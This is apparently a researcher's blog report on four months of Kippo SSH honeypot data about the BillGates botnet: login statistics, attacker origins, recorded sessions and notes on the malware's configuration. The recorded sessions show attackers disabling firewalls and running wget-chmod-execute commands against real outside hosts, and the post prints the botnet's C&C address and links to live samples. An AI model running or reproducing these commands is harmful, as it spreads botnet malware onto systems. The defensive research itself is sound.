Inside a Kippo honeypot: how the billgates botnet spreads

A few months ago I decided to install a honeypot to find some new threat and to collect some new malware to be analyzed. There are several honeypot I had in mind to try, but for now I have chosen Kippo.

From the Kippo’s homepage: “Kippo is a medium interaction SSH honeypot designed to log brute force attacks and, most importantly, the entire shell interaction performed by the attacker.”  (To see all the features offered by this honeypot consult the Kippo’s homepage)

I will not dwell talking about the installation and the features which Kippo offers because this post is intended to be a final report with statistics and graphs only after months in operation. Regarding configuration tip&tricks that I have used, here there are some links that will be very helpful in setting up a similar setup:

My honeypot is a sort of ‘fork’ of original Kippo from desaster Github repo, in which I have merged some changes to hide or improve Kippo itself. That is: improvements like sftp, direct-tcp, exec stdin logging, ssh algorithm update, json logging, etc from Michel Oosterhof Kippo fork, all extra commands from kippo-extra github repo, and some minor changes. Then I applied a few workarounds/patches to hide my Kippo honeypot from each identification attempt.

The honeypot is located in Singapore and it was turned on 1st September 2014 and stopped 31 December 2014, so I have collected 4 months of data, during which, except for some occasional visit from someone who was playing with nmap, I received substantially attacks from a very specific botnet on which I will spend a few words at the end of the post.

Data, like connections, downloads, command inputs, etc, are saved in a database and thanks to the Kippo-Graph script from Bruteforce lab, can be viewed very comfortably via browser.

Now let’s get into the statistics.

Honeypot activity

Honeypot_activity

Success ratio

Total login attempts is 112467 but how many of these have been successful?

success_ratioJust under 4% success login. But why? Let’s see Username and Passwors used to login into SSH.

Top 10 usernames – User

top10_usernamesTop 10 passwords – Password

top10_passwords

Top 10 User-Pass combos – Combo

top10_combinationsOK, strange User/Password combinations have been used, probably that’s the result of a dictionary based script used by the botnet. Clearly the most common attempt, 46% of the total, has been done using root/admin. In fact 3644 is very close to the number of successful logins.

Now let’s see what is the SSH Client used to try to login on the honeypot.

Top 10 SSH clients

top10_ssh_clientsPutty stands out pretty well.

Let’s now analyze the human activity performed on the honeypot.

Top 10 commands

top10_overall_input

Not many sessions have been interactively used by an operator (maybe they found out they were playing on a honeypot?), just 39 sessions have been recorded.

Let’s now try to understand the origin of these connections.

Connections per IP – IP

connections_per_ip_pieGEO

The traffic comes entirely from China! So we can make an educated guess on the origin of the botnet.

Below is the IP information:

IP_info
inetnum: 103.41.124.0 - 103.41.127.255
netname: HEETHAILIMITED-HK
descr: INT'L TOWER 707-713 NATHAN RD MONGKOK KLN HONG KONG
country: HK
admin-c: HA259-AP
tech-c: HA259-AP
status: ALLOCATED PORTABLE
mnt-by: APNIC-HM
mnt-lower: MAINT-HEETHAILIMITED-HK
mnt-routes: MAINT-HEETHAILIMITED-HK
mnt-irt: IRT-HEETHAILIMITED-HK
remarks: -+-+-+-+-+-+-+-+-+-+-+-++-+-+-+-+-+-+-+-+-+-+-+-+-+-+
remarks: This object can only be updated by APNIC hostmasters.
remarks: To update this object, please contact APNIC
remarks: hostmasters and include your organisation's account
remarks: name in the subject line.
remarks: -+-+-+-+-+-+-+-+-+-+-+-++-+-+-+-+-+-+-+-+-+-+-+-+-+-+
changed: hm-changed@apnic.net 20141021
source: APNIC
irt: IRT-HEETHAILIMITED-HK
address: INT'L TOWER 707-713 NATHAN RD MONGKOK KLN HONG KONG, hongkong KLN 999077
e-mail: ming@heethai.com
abuse-mailbox: ming@heethai.com
admin-c: HA259-AP
tech-c: HA259-AP
auth: # Filtered
mnt-by: MAINT-HEETHAILIMITED-HK
changed: hm-changed@apnic.net 20141020
source: APNIC
role: HEETHAILIMITED administrator
address: INT'L TOWER 707-713 NATHAN RD MONGKOK KLN HONG KONG, hongkong KLN 999077
country: HK
phone: +855-78-585-191
fax-no: +855-78-585-191
e-mail: ming@heethai.com
admin-c: HA259-AP
tech-c: HA259-AP
nic-hdl: HA259-AP
mnt-by: MAINT-HEETHAILIMITED-HK
changed: hm-changed@apnic.net 20141020
source: APNIC

The Whois service tells us that IP is located in Honk Kong, but digging deeper some more interesting information can be gathered, like this one:

103.41.124.46: SCAN SSH BruteForce Tool with fake PUTTY version             
103.41.124.46: SSH Brute Force

Interesting right? Yes, those are SSH bruteforcing server.

This is a typical session, with a human operator on the keyboard, recorded from the honeypot.

First example:

my3:~# /etc/init.d/iptables stop
bash: /etc/init.d/iptables: command not found
my3:~# service iptables stop
bash: service: command not found
my3:~# SuSEfirewall2 stop
bash: SuSEfirewall2: command not found
my3:~# reSuSEfirewall2 stop
bash: reSuSEfirewall2: command not found
my3:~# cd /tmp/
my3:/tmp# wget -c http://42.96.191.5:300/arm
--2014-10-12 11:42:18-- http://42.96.191.5:300/arm
Connecting to 42.96.191.5:300... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1001465 (977K) [application/octet-stream]
Saving to: `arm


0% [> ] 4,356 1K/s eta 11m 9s
chmod 0755 /tmp/arm
1% [> ] 10,148 1K/s eta 8m 20s
./arm &
2% [> ] 24,628 2K/s eta 5m 34s
wget -c http://42.96.191.5:300/mips
3% [=> ] 35,028 2K/s eta 7m 12s
chmod 0755 /tmp/mips
./mips &
wget -c http://42.96.191.5:300/wrt
7% [==> ] 72,988 2K/s eta 5m 33s
chmod 0755 /tmp/wrt
./wrt &
16% [======> ] 168,844 4K/s eta 3m 8s
*** End of log! ***

Second example:

my3:~# uname -a
Linux my3 2.6.26-2-686 #1 SMP Wed Nov 4 20:45:37 UTC 2009 i686 GNU/Linux
my3:~# wget http://121.40.141.102:8081/Syn1
--2014-09-23 06:06:43-- http://121.40.141.102:8081/Syn1
Connecting to 121.40.141.102:8081... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1524643 (1M) [application/octet-stream]
Saving to: `Syn1


100%[======================================>] 1,524,643 125K/s

2014-09-23 06:06:55 (125 KB/s) - `Syn1' saved [1524643/1524643]
my3:~# chmod 777 Syn1
my3:~# ./Syn1
bash: ./Syn1: command not found
my3:~#
*** End of log! ***

 

– From SSH BruteForce script (botnet):

bash: /etc/init.d/iptables: command not found
rm: cannot remove `/var/spool/cron/crontabs': No such file or directory
rm: cannot remove `/var/spool/cron/crontabs': No such file or directory
--2014-09-20 06:45:51-- http://www.frade8c.com:9162/root
Connecting to www.frade8c.com:9162... connected.
HTTP request sent, awaiting response... 200 OK
Length: 187350 (182K) [application/octet-stream]
Saving to: `root


100%[======================================>] 187,350 66K/s

2014-09-20 06:45:53 (66 KB/s) - `root' saved [187350/187350]
--2014-09-20 06:45:53-- http://www.frade8c.com:9162/root
Connecting to www.frade8c.com:9162... connected.
HTTP request sent, awaiting response... 200 OK
Length: 187350 (182K) [application/octet-stream]
Saving to: `root


25% [=========> ] 47,538 12K/s eta 11s

Length: 187350 (182K) [application/octet-stream]
Saving to: `root

100%[======================================>] 187,350 66K/s

2014-09-20 06:45:53 (66 KB/s) - `root' saved [187350/187350]
--2014-09-20 06:45:53-- http://www.frade8c.com:9162/root
Connecting to www.frade8c.com:9162... connected.
HTTP request sent, awaiting response... 200 OK
Length: 187350 (182K) [application/octet-stream]
Saving to: `root

100%[======================================>] 187,350 17K/s

2014-09-20 06:46:03 (17 KB/s) - `root' saved [187350/187350]
--2014-09-20 06:46:03-- http://www.frade8c.com:9162/jdhe
Connecting to www.frade8c.com:9162... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1554782 (1M) [application/octet-stream]
Saving to: `jdhe

20% [=======> ] 313,968 71K/s eta 17s

[...]
*** End of log! ***

 

Botnet Info

The large amount of data recorded from the honeypot refer to a very specific botnet: the BillGates botnet. I came to this conclusion after analyzing the IP and samples captured by Kippo and after doing some research with Google. Here you can download the latest fresh samples captured by Kippo (30 December). (password: infected)

I uploaded just one copy of each file since there were a lot of duplicates. See below:

MD5Samples

I preferred not to publish any file analysis because there is enough information online, particularly on Kernelmode Forum there are very interesting information and links, the same informations that I’ve found by analyzing the various modules. The only thing that varies is the C&C IP address obviously (dead at moment) and some minor code changes. In any case some modules were packed with UPX, so I’ve already unpacked them. These modules are the botnet’s modules (originally named atddd and cupsdd(h), names usually differ from the version to version).

Below some info gathered from botnet main module cupsdd(h):

The string decrypted with RSA algorithm is:

v9.jack52088.com:5168:1:1: :1:698412:697896:697380

in which, after split operation, have been assigned to these parameters:

g_strConnTgts = v9.jack52088.com (61.174.48.17) - C&C IP address
g_iGatsPort = 5168 - C&C server's port
g_iGatsIsFx =1
g_iIsService =1
g_strForceNote =
g_bDoBackdoor =1
g_strCryptStart = 698412
g_strDStart = 697896
g_strNStart = 697380

Here C&C Server information: Link

Attack vectors:

11CAttackBase
13CPacketAttack
10CAttackUdp
10CAttackSyn
11CAttackIcmp
10CAttackDns
10CAttackAmp
10CAttackPrx
15CAttackCompress
10CTcpAttack
9CAttackCc
9CAttackIe

User-agent used:

Mozilla/5.0 (|S|) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/|D&23&25|.|D&0&9|.|D&1000&9000|.|D&10&99| Safari/537.17
Mozilla/5.0 (|S|; rv:18.0) Gecko/20100101 Firefox/18.0
Opera/|D&7&9|.|D&70&90| (|S|) Presto/2.|D&8&18|.|D&90&890| Version/|D&11&12|.|D&10&19|

IP Hardcoded for DNS Amplification Attack —> Here (too long)

Source Codes of the project:

crtstuff.c
AmpResource.cpp
Attack.cpp
CmdMsg.cpp
ConfigDoing.cpp
DNSCache.cpp
ExChange.cpp
Global.cpp
Main.cpp
Manager.cpp
MiniHttpHelper.cpp
ProtocolUtil.cpp
ProvinceDns.cpp
StatBase.cpp
SysTool.cpp
ThreadAtk.cpp
ThreadClientStatus.cpp
ThreadConnection.cpp
ThreadFakeDetect.cpp
ThreadHttpGet.cpp
ThreadLoopCmd.cpp
ThreadMonGates.cpp
ThreadRecycle.cpp
ThreadShell.cpp
ThreadShellRecycle.cpp
ThreadTask.cpp
ThreadUpdate.cpp
UserAgent.cpp
AutoLock.cpp
BigInt.cpp
FileOp.cpp
Log.cpp
Media.cpp
NetBase.cpp
RSA.cpp
ThreadCondition.cpp
Thread.cpp
ThreadMutex.cpp
Utility.cpp
WinDefSVC.cpp

To track this botnet you can use BillGates Botnet Tracker developed by the discoverer of the botnet itself.

So this is all, after 4 months of Kippo honeypotting. I will continue to collect data and configure new honeypots and I will come back with updated findings.

Antelox

Comments

  1. Hey, this is Ion, from BruteForce Labs. Great article!! And thanks for using Kippo-Graph 🙂

  2. Thanks for using my code! Nice overview of BillGates.

    If you want to do more analysis, my version now also includes a logstash parser so you can enrich with GeoIP and load into ElasticSearch and use Kibana for graphs.

    Did you find anything else interesting besides BillGates? Latest interesting findings I have are something connecting to French sites with direct-tcpip, which I don’t understand yet and something looking for ‘ubnt’ (ubiquity networks) wifi access points.

    • Hi Michel, your fork is awesome! Thanks…
      Ok for new version, a checkout immediately. =)

      About billgates botnet and connection to French sites I don’t know honestly. I analyzed only a couple of samples (the last captured) to understand better what I had in hands, but not whole samples (about 10GB).
      BTW, they are about 3 weeks I’ve turned off the server because I’m moving around so I’m losing the latter attacks/samples.

      Regards,
      Antelox